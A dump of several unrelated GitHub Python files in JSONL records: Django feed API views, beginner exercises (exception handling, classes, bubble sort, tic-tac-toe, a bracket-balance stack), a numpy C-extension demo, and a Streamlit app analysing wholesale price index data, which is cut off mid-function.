rest_framework.status import HTTP_200_OK\nfrom rest_framework.generics import ListAPIView\nfrom rest_framework.views import APIView\n\nfrom comments.models import Comment\nfrom comments.serializers import CommentSerializer\nfrom .serializers import BaseFeedSerializer\nfrom .models import Feed\n\n\nclass CommentListAPIView(ListAPIView):\n\n queryset = Comment.objects.all()\n serializer_class = CommentSerializer\n\n def get_queryset(self) -> QuerySet:\n queryset = super().get_queryset()\n feed_pk = self.kwargs.get(\"pk\", None)\n feed = get_object_or_404(Feed, pk=feed_pk)\n replies_qs: Prefetch = Prefetch(\n \"replies\",\n Comment.objects.select_related(\n \"user\", \"root\", \"parent\", \"feed\"\n ).prefetch_related(\"likes__user\"),\n )\n comment_likes_qs: str = \"likes__user\"\n\n joined_queryset: QuerySet = queryset.select_related(\n \"feed\", \"root\", \"user\"\n ).prefetch_related(comment_likes_qs, replies_qs)\n\n filtered_queryset: QuerySet = joined_queryset.filter(\n feed=feed, root=None\n ).cache()\n return filtered_queryset\n\n\nclass BaseFeedListView(ListAPIView):\n\n queryset = Feed.objects.select_related(\"user\").prefetch_related(\"likes__user\")\n serializer_class = BaseFeedSerializer\n permission_classes = [IsAuthenticated]\n\n\nclass PopularFeedListView(BaseFeedListView):\n def get_queryset(self):\n queryset: QuerySet = super().get_queryset()\n # order를 이 순서대로 먹어야 인덱스 동작\n # 수정: -num_likes로 인덱싱 걸기\n ordered_qs: QuerySet = (\n queryset.order_by(\"num_likes\", \"num_comments\", \"created_at\")\n .reverse()\n .cache()\n )\n return ordered_qs\n\n\nclass LatestFeedListView(BaseFeedListView):\n def get_queryset(self):\n queryset = super().get_queryset()\n ordered_qs = queryset.order_by(\"-created_at\").cache()\n return ordered_qs\n\n\nclass MyFeedListView(BaseFeedListView):\n def get_queryset(self):\n queryset = super().get_queryset()\n user = self.request.user\n return queryset.filter(user=user).cache()\n\n\nclass MyFeedStatusView(APIView):\n\n premission_classes = [IsAuthenticated]\n\n def get(self, request):\n user = request.user\n data = {\n \"num_my_feeds\": user.feeds.all().cache().count(),\n \"num_my_likes\": user.num_received_comments(),\n \"num_my_reply\": user.num_received_feed_likes(),\n }\n\n return Response(\n data=data,\n status=HTTP_200_OK,\n )\n","repo_name":"junha6316/connecting_feed","sub_path":"feeds/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37189418817","text":"#!/usr/bin/python3\ndef safe_print_list(my_list=[], x=0):\n idx = 0\n while idx < x:\n try:\n print(\"{}\".format(my_list[idx]), end=\"\")\n idx += 1\n except IndexError:\n break\n print(\"\")\n return idx\n","repo_name":"amanabiy/alx-higher_level_programming","sub_path":"0x05-python-exceptions/0-safe_print_list.py","file_name":"0-safe_print_list.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"24137016958","text":"# 3. Реализовать базовый класс Worker (работник), в котором определить\n# атрибуты: name, surname, position (должность), income (доход).\n# Последний атрибут должен быть защищенным и ссылаться на словарь,\n# содержащий элементы: оклад и премия, например, {\"wage\": wage, \"bonus\": bonus}.\n# Создать класс Position (должность) на базе класса Worker. В классе Position\n# реализовать методы получения полного имени сотрудника (get_full_name) и дохода\n# с учетом премии (get_total_income). Проверить работу примера на реальных данных (\n# создать экземпляры класса Position, передать данные, проверить значения атрибутов, вызвать методы экземпляров).\n\n\nclass Worker:\n name: str\n surname: str\n position: str\n _income: dict\n\n def __init__(self, name, surname, position):\n self.name = name\n self.surname = surname\n self.position = position\n self._income = {\"wage\": 0, \"bonus\": 0}\n\n\nclass Position(Worker):\n\n def get_full_name(self):\n string = f\"{self.surname} {self.name}\"\n return string\n\n def get_total_income(self, rand):\n self._income[\"wage\"] = 5000 * rand\n self._income[\"bonus\"] = 1000 * rand\n return self._income[\"wage\"] + self._income[\"bonus\"]\n\n\none = Position(\"Виктория\", \"Белогородова\", \"Пайтон разработчик\")\ntwo = Position(\"Максим\", \"Заборов\", \"Пайтон тестировщик\")\nthree = Position(\"Филипп\", \"Забулдыга\", \"Пайтон разработчик\")\n\nprint(f\"ФИО: {one.get_full_name()} - Деньги: {one.get_total_income(1)} руб.\")\nprint(f\"ФИО: {two.get_full_name()} - Деньги: {two.get_total_income(0.5)} руб.\")\nprint(f\"ФИО: {three.get_full_name()} - Деньги: {three.get_total_income(0.2)} руб.\")\n","repo_name":"MisterHat-89/geekBrainsPython","sub_path":"Lesson_6/exam_3.py","file_name":"exam_3.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27792904547","text":"l = [5,8,1,3,2]\n\n#Bubble Sort Algorithm\n# Bubble Sort is a very simple but inefficient sorting algorithm. \n# Its time complexity is O(n^2), meaning that the number of steps \n# required is proportional to the square of the size of the list.\nstill_swapping = True\n\nwhile still_swapping:\n still_swapping = False\n for i in range(len(l) - 1):\n if l[i] > l[i+1]:\n l[i], l[i+1] = l[i+1], l[i]\n still_swapping = True\nprint(l)","repo_name":"CateGitau/Python_programming","sub_path":"Packt_Python_programming/Chapter_3/exercise39.py","file_name":"exercise39.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"38789035387","text":"# Yunshu Zhao\n# 2016 Winter Term\n# University of Alberta\n\nimport random\n\nclass TicTacToe:\n def __init__(self):\n # \"board\" is a list of 10 strings representing the board (ignore index 0)\n self.board = [\" \"]*10\n self.board[0]=\"#\"\n \n#------------------------------------------------------------- \n def drawBoard(self):\n # This method prints out the board with current plays adjacent to a board with index.\n print(' ' + self.board[7] + ' | ' + self.board[8] + ' | ' + self.board[9],' 7 | 8 | 9 ', sep='\\t')\n print('-----------','-----------', sep='\\t')\n print(' ' + self.board[4] + ' | ' + self.board[5] + ' | ' + self.board[6],' 4 | 5 | 6 ', sep='\\t')\n print('-----------','-----------', sep='\\t')\n print(' ' + self.board[1] + ' | ' + self.board[2] + ' | ' + self.board[3],' 1 | 2 | 3 ', sep='\\t')\n \n#------------------------------------------------------------- \n def boardFull(self):\n # This method checks if the board is already full and returns True. Returns false otherwise \n if \" \" in self.board:\n return False\n else:\n return True\n \n#------------------------------------------------------------- \n def cellIsEmpty(self, cell):\n if cell==0 or cell>9:\n return False\n else:\n return self.board[cell]==\" \"\n\n#------------------------------------------------------------- \n def assignMove(self, cell,ch):\n # assigns the cell of the board to the character ch\n if cell<10 and cell>0:\n self.board[cell]=ch \n \n#------------------------------------------------------------- \n def whoWon(self):\n # returns the symbol of the player who won if there is a winner, otherwise it returns an empty string. \n if self.isWinner(\"x\"):\n return \"x\"\n elif self.isWinner(\"o\"):\n return \"o\"\n else:\n return \"\"\n\n#------------------------------------------------------------- \n def isWinner(self, ch):\n # Given a player's letter, this method returns True if that player has won.\n return ((self.board[7] == ch and self.board[8] == ch and self.board[9] == ch) or # across the top\n (self.board[4] == ch and self.board[5] == ch and self.board[6] == ch) or # across the middle\n (self.board[1] == ch and self.board[2] == ch and self.board[3] == ch) or # across the bottom\n (self.board[7] == ch and self.board[4] == ch and self.board[1] == ch) or # down the left side\n (self.board[8] == ch and self.board[5] == ch and self.board[2] == ch) or # down the middle\n (self.board[9] == ch and self.board[6] == ch and self.board[3] == ch) or # down the right side\n (self.board[7] == ch and self.board[5] == ch and self.board[3] == ch) or # diagonal\n (self.board[9] == ch and self.board[5] == ch and self.board[1] == ch)) # diagonal \n \n# Check if the first avilable cell is empty and place the symbol \n def dumbComputer(self,ch):\n for x in range(1,10):\n if self.cellIsEmpty(x):\n self.assignMove(x,ch)\n break\n \n# Randomly select cell from avilable position\n def randomComputer(self,ch,randomMove):\n freePosition = []\n for x in range(1,10):\n if self.cellIsEmpty(x):\n freePosition.append(x) \n \n if randomMove in freePosition:\n self.assignMove(randomMove,ch)\n elif randomMove not in freePosition:\n self.assignMove(random.choice(freePosition),ch)\n\n#----------------------------------------------- \n def smartComputer(self,ch):\n \n corner = []\n side = []\n freePosition = []\n cell = [] \n \n for x in range(1,10):\n if x == 1 or 3 or 7 or 9:\n if self.board[x] == ' ':\n corner.append(x)\n if x == 2 or 4 or 6 or 8:\n if self.board[x] == ' ':\n side.append(x) \n \n if self.cellIsEmpty(x):\n freePosition.append(x)\n \n if not self.cellIsEmpty(x):\n cell.append(x)\n \n if self.board[5] == ' ': # If the center is empty, place the symbol their\n self.assignMove(5,ch)\n \n elif self.board[5] != ' ' and len(freePosition) == 7: \n self.assignMove(random.choice(corner),ch) \n \n elif len(freePosition) == 8 or 6:\n if len(corner) != 0:\n self.assignMove(random.choice(side),ch)\n \n else:\n self.assignMove(random.choice(corner),ch) \n\n# Check every posible win position--------------------------- \n elif self.board[7] == ch and self.board[8] == ch:\n if self.cellIsEmpty(9):\n self.assignMove(9,ch) \n else:\n self.assignMove(random.choice(freePosition),ch) \n elif self.board[8] == ch and self.board[9] == ch:\n if self.cellIsEmpty(7):\n self.assignMove(7,ch) \n else:\n self.assignMove(random.choice(freePosition),ch) \n elif self.board[7] == ch and self.board[9] == ch:\n if self.cellIsEmpty(8):\n self.assignMove(8,ch) \n else:\n self.assignMove(random.choice(freePosition),ch) \n# Check every posible win position---------------------------- \n elif self.board[4] == ch and self.board[5] == ch:\n if self.cellIsEmpty(6):\n self.assignMove(6,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n elif self.board[5] == ch and self.board[6] == ch:\n if self.cellIsEmpty(4):\n self.assignMove(4,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n elif self.board[4] == ch and self.board[6] == ch:\n if self.cellIsEmpty(5):\n self.assignMove(5,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n# Check every posible win position---------------------------- \n elif self.board[1] == ch and self.board[2] == ch :\n if self.cellIsEmpty(3):\n self.assignMove(3,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n elif self.board[2] == ch and self.board[3] == ch :\n if self.cellIsEmpty(1):\n self.assignMove(1,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n elif self.board[1] == ch and self.board[3] == ch :\n if self.cellIsEmpty(2):\n self.assignMove(2,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n# Check every posible win position---------------------------- \n elif self.board[7] == ch and self.board[4] == ch:\n if self.cellIsEmpty(1):\n self.assignMove(1,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n elif self.board[7] == ch and self.board[1] == ch:\n if self.cellIsEmpty(4):\n self.assignMove(4,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n elif self.board[1] == ch and self.board[4] == ch:\n if self.cellIsEmpty(7):\n self.assignMove(7,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n# Check every posible win position---------------------------- \n elif self.board[8] == ch and self.board[5] == ch:\n if self.cellIsEmpty(2):\n self.assignMove(2,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n elif self.board[8] == ch and self.board[2] == ch:\n if self.cellIsEmpty(5):\n self.assignMove(5,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n elif self.board[2] == ch and self.board[5] == ch:\n if self.cellIsEmpty(8):\n self.assignMove(8,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n# Check every posible win position---------------------------- \n elif self.board[9] == ch and self.board[6] == ch:\n if self.cellIsEmpty(3):\n self.assignMove(3,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n elif self.board[9] == ch and self.board[3] == ch:\n if self.cellIsEmpty(6):\n self.assignMove(6,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n elif self.board[3] == ch and self.board[6] == ch:\n if self.cellIsEmpty(9):\n self.assignMove(9,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n# Check every posible win position---------------------------- \n elif self.board[7] == ch and self.board[5] == ch:\n if self.cellIsEmpty(3):\n self.assignMove(3,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n elif self.board[7] == ch and self.board[3] == ch:\n if self.cellIsEmpty(5):\n self.assignMove(5,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n elif self.board[5] == ch and self.board[3] == ch:\n if self.cellIsEmpty(7):\n self.assignMove(7,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n# Check every posible win position---------------------------- \n elif self.board[9] == ch and self.board[5] == ch:\n if self.cellIsEmpty(1):\n self.assignMove(1,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n elif self.board[9] == ch and self.board[1] == ch:\n if self.cellIsEmpty(5):\n self.assignMove(5,ch)\n else:\n self.assignMove(random.choice(freePosition),ch) \n elif self.board[1] == ch and self.board[5] == ch:\n if self.cellIsEmpty(9):\n self.assignMove(9,ch) \n else:\n self.assignMove(random.choice(freePosition),ch)\n print(len(freePosition))\n\n#------------------------------------------------------------- \n# The main program\ndef main():\n print (\"Welcome to Tic Tac Toe Series\")\n myGameLoop=True\n \n while myGameLoop:\n myBoard=TicTacToe()\n gameIsOn=True\n nameInput = ' '\n typeInput = ' '\n while typeInput not in '1 2 3 4 5 6'.split():\n print('User against user ...............1',\n 'User against dumb computer ......2',\n 'User against random computer ....3',\n 'User against smart computer......4',\n 'Randomly selected game...........5', \n 'Quit ............................6',\n 'Enter your choice: ',\n sep='\\n')\n typeInput = input() \n \n if typeInput == '5': \n typeInput = str(random.randint(1,4)) # Random select from option 1 to 4\n if typeInput != '6':\n nameInput = input('what is your name? ') # If input is 6 then the program quit, else ask user for name\n \n \n turnInput=\" \"\n while turnInput not in 'x o r'.split():\n turnInput = input(nameInput+', do you want to play x or o? Type r if you want me to chose for you.'+'\\n').lower() \n \n turn = 'x' # x is always go first\n \n if turnInput =='o':\n computer = 'x' # Set the computer letter\n \n elif turnInput == 'x':\n computer = 'o'\n \n elif turnInput == 'r':\n turnInput = random.choice('xo')\n \n if turnInput == 'x': # Since the turnInput is random, I use this method t\n computer = 'o'\n elif turnInput == 'o':\n computer ='x'\n \n #------------------------------------------------------------- \n while gameIsOn:\n \n #------------------------------------------------------------- \n # User against user \n if typeInput == '1': \n \n print('User against user') \n \n myBoard.drawBoard()\n print (\"It is the turn for\", turn,\". \",end=\"\")\n move=\"0\"\n while not myBoard.cellIsEmpty(int(move)):\n move=\"0\"\n while move not in \"1 2 3 4 5 6 7 8 9\".split():\n move=input(\"what is your move?\")\n if not myBoard.cellIsEmpty(int(move)):\n print (move,\"is not available. \",end='')\n move=\"0\"\n myBoard.assignMove(int(move),turn)\n winner=myBoard.whoWon()\n if winner!='':\n myBoard.drawBoard()\n print (turn,\"wins. Congrats!\")\n input(\"Press Enter to continue\") \n gameIsOn=False\n elif myBoard.boardFull():\n myBoard.drawBoard()\n print (\"It's a tie.\")\n input(\"Press Enter to continue\") \n gameIsOn=False\n elif turn==\"x\":\n turn=\"o\"\n else:\n turn=\"x\"\n \n #-------------------------------------------------------------\n # This part is use to against the computer\n elif typeInput == '2' or '3' or '4': \n \n if typeInput == '2':\n print('User against dumb computer')\n elif typeInput == '3':\n print('User against random computer') \n randomMove = random.randint(1,9)\n elif typeInput == '4':\n print('User against smart computer')\n \n myBoard.drawBoard()\n print('-------------------------------')\n \n if turn == turnInput: \n print (\"It is the turn for\", turn,\". \",end=\"\")\n \n move=\"0\"\n while not myBoard.cellIsEmpty(int(move)):\n move=\"0\"\n while move not in \"1 2 3 4 5 6 7 8 9\".split():\n \n move=input(\"what is your move?\")\n if not myBoard.cellIsEmpty(int(move)):\n print (move,\"is not available. \",end='')\n move=\"0\"\n \n myBoard.assignMove(int(move),turnInput)\n \n else:\n if typeInput == '2':\n myBoard.dumbComputer(computer)\n elif typeInput == '3':\n myBoard.randomComputer(computer,randomMove)\n elif typeInput == '4':\n myBoard.smartComputer(computer)\n \n winner=myBoard.whoWon()\n if winner!='': \n myBoard.drawBoard()\n print (turn,\"wins. Congrats!\")\n input(\"Press Enter to continue\") \n gameIsOn=False\n elif myBoard.boardFull():\n myBoard.drawBoard()\n print (\"It's a tie.\")\n input(\"Press Enter to continue\") \n gameIsOn=False\n elif turn==\"x\":\n turn=\"o\"\n else:\n turn=\"x\" \n #------------------------------------------------------------- \n # Check whether the player wants to play again\n answer='x'\n while answer.upper() not in \"YN\":\n answer=input(\"Do you want to play another game? (Y/N)\")\n if answer.upper() == \"N\":\n myGameLoop=False\n if typeInput == '6':\n gameIsOn=False\n\nmain() # Call main function","repo_name":"404Not-found/CMPUT-175-Winter-2016","sub_path":"Assignments/Assignment 2/Assignment 2 TicTacToe.py","file_name":"Assignment 2 TicTacToe.py","file_ext":"py","file_size_in_byte":16991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17463352920","text":"class Stack:\n def __init__(self):\n self.stack = []\n \n def is_empty(self):\n return self.stack == []\n \n def push(self, item):\n self.stack.append(item)\n\n def peek(self):\n return self.stack[-1]\n \n def pop_it(self):\n if self.stack == []:\n return None\n else:\n return self.stack.pop()\n\n def size_it(self):\n return len(self.stack)\n \ndef balanced(s):\n stack = Stack()\n pairs = ['()', '{}', '()']\n bopen = [x[0] for x in pairs]\n bclose = [x[1] for x in pairs]\n if stack.size_it()%2 == 0:\n for c in s:\n if c in bopen:\n stack.push(c)\n elif c in bclose:\n if stack == []:\n return 'Несбалансированно'\n else:\n if f'{stack.peek()}{c}' in pairs:\n stackTop = stack.pop_it()\n else:\n return 'Несбалансированно'\n return 'Сбалансированно'\n else:\n return \"Несбалансировано\"\n\nstring = '[([])((([[[]]])))]{()}'\nprint(balanced(string))\n \n","repo_name":"Julia-Vaulina/stack","sub_path":"stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40342227874","text":"import numpy as np\nimport cext04\n\nprint('A new array from C extention')\na = cext04.as_nparray()\nprint(a)\n\nprint('Reading array b in C extension')\nb = np.ones((4, 3))\ncext04.read_2darray(b)\n","repo_name":"junkoda/python_c_ext","sub_path":"04_nparray/use_cext04.py","file_name":"use_cext04.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"77"} +{"seq_id":"74180224247","text":"#Libraries\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom yellowbrick.cluster import KElbowVisualizer\r\nimport streamlit as st\r\nfrom scipy.cluster.hierarchy import dendrogram, linkage\r\nfrom scipy.stats import zscore \r\nfrom statsmodels.tsa.seasonal import seasonal_decompose\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\n#Sklearn libraries\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, LSTM\r\n\r\n#Data preparation\r\ndata = pd.read_csv('WPI_dataset.csv', index_col='COMM_IDX_MONTH', parse_dates=True)\r\n#Creating dictionary of 22categories dataframe.\r\ncol_names = ['(A). FOOD ARTICLES','(B). NON-FOOD ARTICLES','(C). MINERALS','(D). CRUDE PETROLEUM & NATURAL GAS','II FUEL & POWER',\r\n '(B). MINERAL OILS','(C). ELECTRICITY','III MANUFACTURED PRODUCTS','(B). MANUFACTURE OF BEVERAGES','(C). MANUFACTURE OF TOBACCO PRODUCTS',\r\n '(D). MANUFACTURE OF TEXTILES','(E). MANUFACTURE OF WEARING APPAREL','(F). MANUFACTURE OF LEATHER AND RELATED PRODUCTS',\r\n '(G). MANUFACTURE OF WOOD AND OF PRODUCTS OF WOOD AND CORK ','(H). MANUFACTURE OF PAPER AND PAPER PRODUCTS',\r\n '(I). PRINTING AND REPRODUCTION OF RECORDED MEDIA ','(J). MANUFACTURE OF CHEMICALS AND CHEMICAL PRODUCTS',\r\n '(K). MANUFACTURE OF PHARMACEUTICALS, MEDICINAL CHEMICAL AND BOTANICAL PRODUCTS','(L). MANUFACTURE OF RUBBER AND PLASTICS PRODUCTS',\r\n '(M). MANUFACTURE OF OTHER NON-METALLIC MINERAL PRODUCTS','(N). MANUFACTURE OF BASIC METALS','(O). MANUFACTURE OF FABRICATED METAL PRODUCTS, EXCEPT MACHINERY AND EQUIPMENT']\r\ncategories_dict = {}\r\n\r\nfor i in range(len(col_names)-1):\r\n cl = col_names[i]\r\n start_col = col_names[i]\r\n end_col = col_names[i + 1]\r\n dataframe = data.loc[:, start_col:end_col]\r\n dataframe = dataframe.iloc[:, :-1]\r\n categories_dict [cl] = dataframe\r\nlast_df = data.loc[:,'(O). MANUFACTURE OF FABRICATED METAL PRODUCTS, EXCEPT MACHINERY AND EQUIPMENT':]\r\ncategories_dict ['(O). MANUFACTURE OF FABRICATED METAL PRODUCTS, EXCEPT MACHINERY AND EQUIPMENT'] = last_df\r\n\r\ndef trend_visualization_page():\r\n #1. Trend Visualization\r\n st.title('Interactive WPI Trend Visualization')\r\n\r\n # Task 1: Trend Visualization\r\n st.sidebar.header('Trend Visualization')\r\n selected_category = st.sidebar.selectbox('Select Category', ['Entire Dataset'] + list(categories_dict.keys()))\r\n if selected_category == 'Entire Dataset':\r\n selected_commodities = st.sidebar.multiselect('Select Commodities', data.columns.tolist(), default='ALL COMMODITIES')\r\n else:\r\n selected_commodities = st.sidebar.multiselect('Select Commodities', ['All in Category'] + categories_dict[selected_category].columns.tolist())\r\n if selected_commodities:\r\n plt.figure(figsize=(12, 6))\r\n\r\n if 'All in Category' in selected_commodities and selected_category != 'Entire Dataset':\r\n for commodity in categories_dict[selected_category].columns.tolist():\r\n plt.plot(data.index, categories_dict[selected_category][commodity], label=commodity)\r\n else:\r\n for commodity in selected_commodities:\r\n plt.plot(data.index, data[commodity], label=commodity)\r\n\r\n plt.axhline(y=data['ALL COMMODITIES'].mean(), color='r', linestyle='--', label='Mean WPI')\r\n plt.xlabel('Time')\r\n plt.ylabel('WPI')\r\n plt.title('WPI Trends Over Time')\r\n plt.grid(True)\r\n plt.legend()\r\n plt.tight_layout()\r\n st.pyplot(plt)\r\n \r\ndef calculate_volatility_page():\r\n \r\n st.title('Volatility Analysis')\r\n st.write(\"Volatility analysis helps us understand how the prices of commodities or categories fluctuate over time.\")\r\n st.write(\"In this analysis, we calculate the rolling standard deviation of prices over a 12-month window to measure volatility.\")\r\n st.write(\"Higher volatility indicates greater price fluctuations, while lower volatility suggests price stability.\")\r\n\r\n selected_category_volatility = st.sidebar.selectbox('Select Category for Volatility Calculation', list(categories_dict.keys()))\r\n selected_commodity_volatility = st.sidebar.selectbox('Select Commodity for Volatility Calculation', ['Entire Category'] + list(categories_dict[selected_category_volatility].columns))\r\n if selected_commodity_volatility == 'Entire Category':\r\n volatility_df = categories_dict[selected_category_volatility].std()\r\n volatility_df_cat = data[selected_category_volatility].rolling(window=12).std()\r\n st.write('Top 3 Highest volatility: ', volatility_df.nlargest(3))\r\n st.write('Top 3 Lowest volatility (Stable): ', volatility_df.nsmallest(3))\r\n else:\r\n volatility_df = data[selected_commodity_volatility].rolling(window=12).std()\r\n \r\n highest_volatility_date = volatility_df.nlargest(1).index[0].strftime('%B %d, %Y')\r\n highest_volatility_std = round(volatility_df.nlargest(1).values[0], 2)\r\n st.write(f\"{selected_commodity_volatility} exhibited the highest volatility on {highest_volatility_date}, with a standard deviation of {highest_volatility_std}. This indicates significant price fluctuations for {selected_commodity_volatility} commodities during that period.\")\r\n\r\n # Create a figure and set its size\r\n plt.figure(figsize=(12, 6))\r\n\r\n # Plot the volatility graph\r\n plt.plot(volatility_df.index, volatility_df.values)\r\n plt.xlabel('Time')\r\n plt.ylabel('Volatility')\r\n plt.title(f'Volatility in {selected_commodity_volatility} WPI')\r\n\r\n\r\n st.pyplot(plt)\r\n\r\ndef monthy_yearly_rate_change_analysis():\r\n st.title(\"Inflation trend Analysis\")\r\n inflation_plot()\r\n \r\n selected_category_column = st.sidebar.selectbox('Select Category', list(categories_dict.keys()))\r\n selected_commodity_column = st.sidebar.selectbox('Select Commodity', ['Entire Category'] + list(categories_dict[selected_category_column].columns))\r\n \r\n \r\n if selected_commodity_column == 'Entire Category':\r\n st.header(f'Monthly and Yearly Inflation analysis of {selected_category_column}')\r\n rate_change_monthly = data[selected_category_column].pct_change() * 100 # Monthly rate of change\r\n rate_change_yearly = data[selected_category_column].pct_change(periods=12) * 100 # Yearly rate of change\r\n else:\r\n st.header(f'Monthly and Yearly Inflation analysis of {selected_commodity_column}')\r\n rate_change_monthly = data[selected_commodity_column].pct_change() * 100 \r\n rate_change_yearly = data[selected_commodity_column].pct_change(periods=12)\r\n \r\n # Monthly rate of change\r\n plt.figure(figsize=(12, 6))\r\n plt.title(f\"Monthly Rate Change for {selected_category_column}\")\r\n plt.xlabel(\"Date\")\r\n plt.ylabel(\"Monthly Rate Change (%)\")\r\n plt.plot(rate_change_monthly.index, rate_change_monthly.values, label=\"Monthly Rate Change\", marker='o')\r\n plt.legend()\r\n plt.grid(True)\r\n st.pyplot(plt)\r\n \r\n # Yearly rate of change\r\n plt.figure(figsize=(12, 6))\r\n plt.title(f\"Yearly Rate Change for {selected_category_column}\")\r\n plt.xlabel(\"Date\")\r\n plt.ylabel(\"Yearly Rate Change (%)\")\r\n plt.plot(rate_change_yearly.index, rate_change_yearly.values, label=\"Yearly Rate Change\", marker='o')\r\n plt.legend()\r\n plt.grid(True)\r\n st.pyplot(plt)\r\n \r\n # Find and print the maximum inflation year and month\r\n max_monthly_inflation = rate_change_monthly.idxmax()\r\n max_yearly_inflation = rate_change_yearly.idxmax()\r\n \r\n # st.write(f\"Maximum Inflation occurred in {max_monthly_inflation.strftime('%B %Y')}\")\r\n st.write(f\"Maximum Inflation occurred in {max_yearly_inflation.strftime('%Y')}\")\r\n\r\n \r\ndef correlation_analysis_commodity():\r\n #Correlation between Category index and commodities in that category\r\n st.title('Correlation Analysis')\r\n\r\n # Add information about correlation analysis\r\n st.write(\"Correlation analysis helps us understand the relationship between different commodities within a selected category.\")\r\n st.write(\"The heatmap below shows the correlation between commodities in the selected category.\")\r\n\r\n selected_category_correlation = st.sidebar.selectbox('Select Category for Correlation Calculation', list(categories_dict.keys()))\r\n correlation_df = categories_dict[selected_category_correlation]\r\n correlation_matrix = correlation_df.corr()\r\n \r\n plt.figure(figsize=(12, 10))\r\n mask = correlation_matrix == 1.0\r\n sns.heatmap(correlation_matrix, annot=True, cmap='coolwarm', fmt=\".2f\", linewidths=.5)\r\n plt.title('Correlation between Category-wise Overall Value and commodities in that Category')\r\n st.pyplot(plt)\r\n \r\n category_correlation_matrix = correlation_matrix[selected_category_correlation].drop(selected_category_correlation)\r\n top_corr_df = category_correlation_matrix.abs().sort_values(ascending=False)\r\n top_corr_df = top_corr_df[top_corr_df < 1.0] \r\n top_corr = top_corr_df.head(3)\r\n \r\n st.write(f\"The commodity with the maximum correlation to '{selected_category_correlation}' is:\")\r\n st.write(f\"{top_corr.index[0]} with correlation value: {top_corr.values[0]:.2f}\")\r\n st.write(f\"After that {top_corr.index[1]} with correlation value: {top_corr.values[1]:.2f}\")\r\n st.write(f\"After that {top_corr.index[2]} with correlation value: {top_corr.values[2]:.2f}\")\r\n \r\ndef clustering_page():\r\n st.header(\"Cluster Analysis\")\r\n st.write(\"Using clustering algorithms to group similar categories together.\")\r\n excluded_columns = col_names + ['ALL COMMODITIES']\r\n commodities_data = data.drop(columns=excluded_columns).T\r\n from sklearn.preprocessing import StandardScaler\r\n\r\n scaler = StandardScaler()\r\n scaled_data = scaler.fit_transform(commodities_data)\r\n \r\n model = KMeans()\r\n visualizer = KElbowVisualizer(model, k=(1,12))\r\n visualizer.fit(scaled_data)\r\n # visualizer.show()\r\n\r\n # Get the optimal number of clusters\r\n n_clusters = visualizer.elbow_value_\r\n\r\n # Apply K-Means clustering with the optimal number of clusters\r\n kmeans = KMeans(n_clusters=n_clusters, random_state=42)\r\n clusters = kmeans.fit_predict(scaled_data)\r\n \r\n commodities_data['Cluster'] = clusters\r\n \r\n pca = PCA(n_components=2)\r\n reduced_data = pca.fit_transform(scaled_data)\r\n\r\n plt.figure(figsize=(10, 6))\r\n scatter = plt.scatter(reduced_data[:, 0], reduced_data[:, 1], c=clusters, cmap='viridis', alpha=0.6)\r\n plt.title('2D PCA of Commodities Clusters')\r\n plt.xlabel('Principal Component 1')\r\n plt.ylabel('Principal Component 2')\r\n plt.colorbar(scatter)\r\n st.pyplot(plt)\r\n \r\ndef heatmap_page1(): #Correlation between categories and General index\r\n st.header(\"Heatmap\")\r\n st.write(\"Heatmap showing the correlation between categories in the WPI dataset.\")\r\n\r\n selected_columns = col_names + ['ALL COMMODITIES']\r\n correlation_df = data[selected_columns]\r\n correlation_matrix = correlation_df.corr()\r\n \r\n plt.figure(figsize=(12, 10))\r\n sns.heatmap(correlation_matrix, annot=True, cmap='coolwarm', fmt=\".2f\", linewidths=.5)\r\n plt.title('Correlation between Category-wise Overall Value and General WPI Index')\r\n st.pyplot(plt)\r\n \r\n all_comm_correlation_matrix = correlation_matrix['ALL COMMODITIES'].drop('ALL COMMODITIES')\r\n top_corr_df = all_comm_correlation_matrix.abs().sort_values(ascending=False)\r\n top_corr = top_corr_df.head(2)\r\n st.write(f\"{top_corr.index[1]} has Maximum Correlation with General Trend.\")\r\n \r\ndef time_series_analysis():\r\n st.title('Time Series Analysis Page')\r\n\r\n def decompose_time_series(data, commodity):\r\n result = seasonal_decompose(data[commodity], model='additive', period=12)\r\n return result\r\n \r\n selected_category_decompose = 